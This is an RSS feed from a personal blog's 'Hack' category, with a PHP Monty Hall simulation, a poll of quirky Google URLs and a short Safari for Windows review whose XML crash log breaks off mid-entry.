<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Life, Hacks, and Internet &#187; Hack</title>
	<atom:link href="http://pufone.org/blog/type/hack/feed/" rel="self" type="application/rss+xml" />
	<link>http://pufone.org/blog</link>
	<description>AdSense Money with WordPress in Google while Hacking.</description>
	<lastBuildDate>Thu, 18 Aug 2011 08:15:30 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Monty Hall Problem Statistics Algorithm</title>
		<link>http://pufone.org/blog/monty-hall-problem-statistics-algorithm/</link>
		<comments>http://pufone.org/blog/monty-hall-problem-statistics-algorithm/#comments</comments>
		<pubDate>Fri, 17 Jul 2009 09:14:47 +0000</pubDate>
		<dc:creator>Cugone</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://pufone.org/blog/monty-hall-problem-statistics-algorithm/</guid>
		<description><![CDATA[Today the goats made it to the front page of reddit yet again, this time it&#8217;s a forum post with over 9000 replies.

Because I love winning, I decided to settle this once and for all, the Mythbusters way: 10000 games, 20000 cars, 10000 goats, 30 PHP lines.
Run the code below*.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
&#60;?php 
$games=10000;
$win=0; 	//number of wins if [...]]]></description>
			<content:encoded><![CDATA[<p><img style="margin-left:15px;" width="180" height="100" align="right" alt="Goat behind door number 3" src="http://upload.wikimedia.org/wikipedia/commons/thumb/3/3f/Monty_open_door.svg/180px-Monty_open_door.svg.png" />Today <a href="http://www.reddit.com/r/science/comments/91trm/game_show_problem_marilyn_vos_savant_vs_the_phds/">the goats</a> made it to the front page of reddit <a href="http://www.reddit.com/search?q=monty+hall">yet again</a>, this time it&#8217;s a forum post with over 9000 replies.</p>
<p><span id="more-95"></span></p>
<p>Because I love winning, I decided to settle this once and for all, the Mythbusters way: 10000 games, 20000 cars, 10000 goats, 30 PHP lines.</p>
<p><a href="http://pufone.org/blog/goat.php">Run the code below*.</a></p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> 
<span style="color: #000088;">$games</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">10000</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$win</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span> 	<span style="color: #666666; font-style: italic;">//number of wins if I don't switch</span>
<span style="color: #000088;">$winswitch</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span>	<span style="color: #666666; font-style: italic;">//number of wins if I switch</span>
&nbsp;
<span style="color: #b1b100;">for</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$i</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">;</span><span style="color: #000088;">$i</span><span style="color: #339933;">&lt;=</span><span style="color: #000088;">$games</span><span style="color: #339933;">;</span><span style="color: #000088;">$i</span><span style="color: #339933;">++</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
&nbsp;
<span style="color: #000088;">$doors</span><span style="color: #339933;">=</span><span style="color: #990000;">array</span><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">0</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">2</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>			<span style="color: #666666; font-style: italic;">//create the doors</span>
<span style="color: #000088;">$doorstemp</span><span style="color: #339933;">=</span><span style="color: #990000;">array</span><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">0</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">2</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>		<span style="color: #666666; font-style: italic;">//doors in the hosts mind</span>
<span style="color: #000088;">$prize</span><span style="color: #339933;">=</span><span style="color: #990000;">rand</span><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">0</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">2</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>			<span style="color: #666666; font-style: italic;">//the prize is behind this door</span>
<span style="color: #000088;">$choice</span><span style="color: #339933;">=</span><span style="color: #990000;">rand</span><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">0</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">2</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>			<span style="color: #666666; font-style: italic;">//the door number I choose</span>
<span style="color: #990000;">unset</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$doorstemp</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$choice</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>		<span style="color: #666666; font-style: italic;">//the host must not open one door that I chose</span>
<span style="color: #990000;">unset</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$doorstemp</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$prize</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>		<span style="color: #666666; font-style: italic;">//the host must not open the door where the prize is...</span>
<span style="color: #000088;">$hostopensfirst</span><span style="color: #339933;">=</span><span style="color: #990000;">array_rand</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$doorstemp</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>	<span style="color: #666666; font-style: italic;">//the host decides what door to open</span>
<span style="color: #990000;">unset</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$doors</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$hostopensfirst</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>		<span style="color: #666666; font-style: italic;">//the host opens a door with a cheap prize</span>
	<span style="color: #666666; font-style: italic;">//do not switch</span>
	<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$choice</span><span style="color: #339933;">==</span><span style="color: #000088;">$prize</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
		<span style="color: #000088;">$win</span><span style="color: #339933;">++;</span>
	<span style="color: #009900;">&#125;</span>
	<span style="color: #666666; font-style: italic;">//switch</span>
	<span style="color: #990000;">unset</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$doors</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$choice</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>		<span style="color: #666666; font-style: italic;">//discard my first choice</span>
	<span style="color: #000088;">$choice</span><span style="color: #339933;">=</span><span style="color: #990000;">array_pop</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$doors</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>	<span style="color: #666666; font-style: italic;">//select the alternative</span>
	<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$choice</span><span style="color: #339933;">==</span><span style="color: #000088;">$prize</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>				
		<span style="color: #000088;">$winswitch</span><span style="color: #339933;">++;</span>
	<span style="color: #009900;">&#125;</span>	
<span style="color: #009900;">&#125;</span>
<span style="color: #b1b100;">echo</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;Playing <span style="color: #006699; font-weight: bold;">$games</span> games. If you:<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #b1b100;">echo</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;-hold you win  : <span style="color: #006699; font-weight: bold;">$win</span> goats.<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #b1b100;">echo</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;-switch you win: <span style="color: #006699; font-weight: bold;">$winswitch</span> goats&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>The <a href="http://en.wikipedia.org/wiki/Monty_Hall_problem">Monty Hall problem</a> is a probability puzzle based on the American television game show Let&#8217;s Make a Deal. The name comes from the show&#8217;s host, Monty Hall. The problem is also called the Monty Hall paradox, as it is a veridical paradox in that the result appears absurd but is demonstrably true.</p>
<p>*Modified for lolz</p>
]]></content:encoded>
			<wfw:commentRss>http://pufone.org/blog/monty-hall-problem-statistics-algorithm/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Top 5 Strange Google Links</title>
		<link>http://pufone.org/blog/top-5-strange-google-links/</link>
		<comments>http://pufone.org/blog/top-5-strange-google-links/#comments</comments>
		<pubDate>Sun, 17 Jun 2007 11:04:33 +0000</pubDate>
		<dc:creator>Cugone</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://pufone.org/blog/top-5-strange-google-links/</guid>
		<description><![CDATA[

	
		You choose!
		
		
		
			
					www.google.com/dilbert.html
			
			
					www.google.com/intl/xx-hacker/. Also Bork , Elmer and Piglatin
			
			
					www.google.com/googledance2002/images/zg2.jpg
			
			
					www.google.com/Easter/feature_easter.html and Heart
			
			
					www.google.com/chad_bikes_america.html
			
		
			
			
			
			View Results
		
		
	

Other strange and funny google links:

www.google.com/adwordsreview04/
www.google.com/moms/ and www.google.com/moms01/
www.google.com/mentalplex/
www.google.com/googlegulp/
www.google.com/jobs/britney.html
www.google.com/codejam/
www.google.com/jobs/lunar_job.html
www.google.com/onlinebusiness/index.html
www.google.com/sitemap.xml
www.google.com/robots.txt
code.google.com/webstats/2005-12/pages.html

]]></description>
			<content:encoded><![CDATA[<p align="center"><img width="276" height="130" align="middle" src="http://pufone.org/blog/wp-content/uploads/2007/06/google_dilbert_logo.gif" alt="Google Dilbert Logo - Doodle" title="Google Dilbert Logo - Doodle" /></p>
<p><div>
	<div class='democracy'>
		<p align="center"><strong class="poll-question"></a>You choose!</strong></p>
		<div class='dem-results'>
		<form action='http://pufone.org/blog/wp-content/plugins/democracy/democracy.php' onsubmit='return dem_Vote(this)'>
		<ul>
			<li>
					<input type='radio' id='dem-choice-8' value='8' name='dem_poll_2' /><label for='dem-choice-8'><a target="_blank" href="http://www.google.com/dilbert.html" rel="external nofollow">www.google.com/dilbert.html</a></label>
			</li>
			<li>
					<input type='radio' id='dem-choice-7' value='7' name='dem_poll_2' /><label for='dem-choice-7'><a href="http://www.google.com/intl/xx-hacker/" target="_blank" rel="external nofollow">www.google.com/intl/xx-hacker/</a>. Also <a target="_blank" href="http://www.google.com/intl/xx-bork/" rel="external nofollow">Bork</a> , <a target="_blank" href="http://www.google.com/intl/xx-elmer/" rel="external nofollow">Elmer</a> and <a target="_blank" href="http://www.google.com/intl/xx-piglatin/" rel="external nofollow">Piglatin</a></label>
			</li>
			<li>
					<input type='radio' id='dem-choice-10' value='10' name='dem_poll_2' /><label for='dem-choice-10'><a target="_blank" href="http://www.google.com/googledance2002/images/zg2.jpg" rel="external nofollow">www.google.com/googledance2002/images/zg2.jpg</a></label>
			</li>
			<li>
					<input type='radio' id='dem-choice-6' value='6' name='dem_poll_2' /><label for='dem-choice-6'><a href="http://www.google.com/Easter/feature_easter.html" target="_blank" rel="external nofollow">www.google.com/Easter/feature_easter.html</a> and <a href="http://www.google.com/heart/heart01.html" target="_blank" rel="external nofollow">Heart</a></label>
			</li>
			<li>
					<input type='radio' id='dem-choice-9' value='9' name='dem_poll_2' /><label for='dem-choice-9'><a target="_blank" href="http://www.google.com/chad_bikes_america.html" rel="external nofollow">www.google.com/chad_bikes_america.html</a></label>
			</li>
		</ul>
			<input type='hidden' name='dem_poll_id' value='2' />
			<input type='hidden' name='dem_action' value='vote' />
			<input type='submit' class='dem-vote-button' value='Vote' />
			<a href='/blog/type/hack/feed/?dem_action=view&amp;dem_poll_id=2' onclick='return dem_getVotes("http://pufone.org/blog/wp-content/plugins/democracy/democracy.php?dem_action=view&amp;dem_poll_id=2", this)' rel='nofollow' class='dem-vote-link' align='center'>View Results</a>
		</form>
		</div>
	</div></div>
</p>
<p style="margin-left: 100px;">Other strange and funny google links:</p>
<ul style="margin-left: 100px;">
<li><a rel="external nofollow" href="http://www.google.com/adwordsreview04/" target="_blank">www.google.com/adwordsreview04/</a></li>
<li><a target="_blank" rel="external nofollow" href="http://www.google.com/moms/">www.google.com/moms/</a> and <a target="_blank" rel="external nofollow" href="http://www.google.com/moms01/">www.google.com/moms01/</a></li>
<li><a target="_blank" rel="external nofollow" href="http://www.google.com/mentalplex/">www.google.com/mentalplex/</a></li>
<li><a target="_blank" rel="external nofollow" href="http://www.google.com/googlegulp/">www.google.com/googlegulp/</a></li>
<li><a target="_blank" rel="external nofollow" href="http://www.google.com/jobs/britney.html">www.google.com/jobs/britney.html</a></li>
<li><a target="_blank" rel="external nofollow" href="http://www.google.com/codejam/">www.google.com/codejam/</a></li>
<li><a target="_blank" rel="external nofollow" href="http://www.google.com/jobs/lunar_job.html">www.google.com/jobs/lunar_job.html</a></li>
<li><a target="_blank" rel="external nofollow" href="http://www.google.com/onlinebusiness/index.html">www.google.com/onlinebusiness/index.html</a></li>
<li><a href="http://www.google.com/sitemap.xml" rel="external nofollow" target="_blank">www.google.com/sitemap.xml</a></li>
<li><a href="http://www.google.com/robots.txt" rel="external nofollow" target="_blank">www.google.com/robots.txt</a></li>
<li><a target="_blank" rel="external nofollow" href="http://code.google.com/webstats/2005-12/pages.html">code.google.com/webstats/2005-12/pages.html</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://pufone.org/blog/top-5-strange-google-links/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Safari For Windows &#8211; Quick Review</title>
		<link>http://pufone.org/blog/safari-for-windows-quick-review/</link>
		<comments>http://pufone.org/blog/safari-for-windows-quick-review/#comments</comments>
		<pubDate>Tue, 12 Jun 2007 00:07:51 +0000</pubDate>
		<dc:creator>Cugone</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://pufone.org/blog/safari-for-windows/</guid>
		<description><![CDATA[About 10 seconds after starting up Apple&#8217;s Safari for Windows I decide to click the small cross (+) button available on the Toolbar. Here&#8217;s what it does:
 
This happens every single time I click it. What does it do anyway? Bookmarks?
It also crashes when I use the search box on apple.com. The browser looks awesome [...]]]></description>
			<content:encoded><![CDATA[<p align="center">About 10 seconds after starting up Apple&#8217;s <a href="http://www.apple.com/safari/" rel="external nofollow" target="_blank" title="apple.com - Safari">Safari for Windows</a> I decide to click the small cross (+) button available on the Toolbar. Here&#8217;s what it does:</p>
<p align="center"><a href="http://pufone.org/blog/safari-for-windows-quick-review/safari-for-windows-crash/" rel="attachment wp-att-67" title="Safari For Windows Crash"><img src="http://pufone.org/blog/wp-content/uploads/2007/06/safari_windows_error.thumbnail.png" alt="Safari For Windows Crash" /></a> <a href="http://pufone.org/blog/safari-for-windows-quick-review/safari-for-windows-crash-details/" rel="attachment wp-att-68" title="Safari For Windows Crash Details"><img src="http://pufone.org/blog/wp-content/uploads/2007/06/safari_windows_error_details.thumbnail.png" alt="Safari For Windows Crash Details" /></a></p>
<p align="center">This happens every single time I click it. What does it do anyway? Bookmarks?</p>
<p>It also crashes when I use the search box on apple.com. The browser looks awesome and it&#8217;s pretty fast too, but I think they rushed the Beta.</p>
<p>I dislike that <a href="http://www.opera.com" rel="external nofollow" target="_blank" title="opera.com">Opera</a> was rated as slowest in the HTML performance benchmark with 6.22 seconds after IE7 with 4.63. That&#8217;s marketing bullshit.</p>
<p align="center">Apparently it passes the <a href="http://www.webstandards.org/files/acid2/test.html" target="_blank" rel="external nofollow" title="Take the Acid2 Test - webstandards.org">Acid2 Test</a>, but after refreshing the page it somehow fails. What&#8217;s up with that?</p>
<p align="center"><a href='http://pufone.org/blog/safari-for-windows-quick-review/apple-safari-passes-acid2-test/' rel='attachment wp-att-69' title='Apple Safari Passes Acid2 Test'><img src='http://pufone.org/blog/wp-content/uploads/2007/06/safari_windows_acid2_pass_1280x800.thumbnail.png' alt='Apple Safari Passes Acid2 Test' /></a> <a href='http://pufone.org/blog/safari-for-windows-quick-review/apple-safari-passes-acid2-test-2/' rel='attachment wp-att-70' title='Apple Safari Passes Acid2 Test'><img src='http://pufone.org/blog/wp-content/uploads/2007/06/safari_windows_acid2_fail_1280x800.thumbnail.png' alt='Apple Safari Passes Acid2 Test' /></a></p>
<p>Overall I think Safari for Windows is going to be a nice browser, but right it&#8217;s only useful for apple junkies. Definitely not better than Opera or FireFox.<strong>Overall score: 2/5</strong></p>
<p>The + crash error log:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre></td><td class="code"><pre class="xml" style="font-family:monospace;"><span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;?xml</span> <span style="color: #000066;">version</span>=<span style="color: #ff0000;">&quot;1.0&quot;</span> <span style="color: #000066;">encoding</span>=<span style="color: #ff0000;">&quot;UTF-16&quot;</span><span style="color: #000000; font-weight: bold;">?&gt;</span></span>
<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;DATABASE<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;EXE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;Safari.exe&quot;</span> <span style="color: #000066;">FILTER</span>=<span style="color: #ff0000;">&quot;GRABMI_FILTER_PRIVACY&quot;</span><span style="color: #000000; font-weight: bold;">&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;CFNetwork.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;409600&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x3C854DEC&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1.185.6.0&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1.185.6.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1, 185, 6, 0&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;CFNetwork&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;Apple Computer, Inc.&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot; CFNetwork&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1, 185, 6, 0&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;CFNetwork.dll&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;CFNetwork&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;Copyright (C) 2007&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x682BC&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1.185.6.0&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1.185.6.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 16:26:39&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 16:26:39&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;CoreFoundation.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;458752&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x59422635&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1.434.6.0&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1.434.6.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1, 434, 6, 0&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;CoreFoundation&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;Apple Computer, Inc.&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot;CoreFoundation&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1, 434, 6, 0&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;CoreFoundation.dll&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;CoreFoundation&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;Copyright (C) 2007&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x7E817&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1.434.6.0&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1.434.6.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 16:21:12&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 16:21:12&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;CoreGraphics.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;3588096&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x678E2320&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1.0.20.0&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1.0.20.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1.0.20.0&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;CoreGraphics DLL&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;Apple Computer, Inc.&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot; CoreGraphics&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1.0.20.0&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;CoreGraphics.dll&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;CoreGraphics&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;© 2006 Apple Computer, Inc. All Rights Reserved.&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x37050F&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1.0.20.0&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1.0.20.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/01/2007 22:53:58&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/01/2007 22:53:58&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;icudt36.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;8822784&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x516F586C&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3, 6, 0, 0&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;ICU Data DLL&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;IBM Corporation and others&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot;International Components for Unicode&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3, 6, 0, 0&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;icudt36.dll&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot; Copyright (C) 2005, International Business Machines Corporation and others. All Rights Reserved. &quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: 